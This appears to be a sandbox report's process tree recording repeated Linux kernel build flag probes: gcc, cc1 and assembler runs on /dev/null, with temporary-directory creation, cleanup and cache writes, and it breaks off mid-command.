/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2061/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2064
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2061/tmp5⤵PID:2065
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2061/tmp5⤵PID:2065
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2061/tmp5⤵PID:2065
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2061/tmp5⤵
- Writes file to tmp directory
PID:2065 -
/bin/rmrm -rf /tmp/a/.tmp_20614⤵PID:2066
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fconserve-stack\";_else_echo_\"\";_fi := -fconserve-stack' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2067 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=implicit-int\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2068 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20684⤵PID:2069
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" -c -x c /dev/null -o /tmp/a/.tmp_2068/tmp4⤵PID:2070
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2068/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2071
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2068/tmp5⤵PID:2072
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2068/tmp5⤵PID:2072
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2068/tmp5⤵PID:2072
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2068/tmp5⤵PID:2072
-
/bin/rmrm -rf /tmp/a/.tmp_20684⤵PID:2073
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Werror_implicit-int\";_else_echo_\"\";_fi := -Werror=implicit-int' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2074 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=strict-prototypes\"; else echo \"\"; fi"3⤵PID:2075
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20754⤵PID:2076
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" -c -x c /dev/null -o /tmp/a/.tmp_2075/tmp4⤵PID:2077
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2075/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-Werror=strict-prototypes" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2078
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2075/tmp5⤵PID:2079
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2075/tmp5⤵PID:2079
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2075/tmp5⤵PID:2079
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2075/tmp5⤵PID:2079
-
/bin/rmrm -rf /tmp/a/.tmp_20754⤵PID:2080
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Werror_strict-prototypes\";_else_echo_\"\";_fi := -Werror=strict-prototypes' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:2081 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=date-time\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2082 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20824⤵PID:2083
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" -c -x c /dev/null -o /tmp/a/.tmp_2082/tmp4⤵PID:2084
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2082/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong 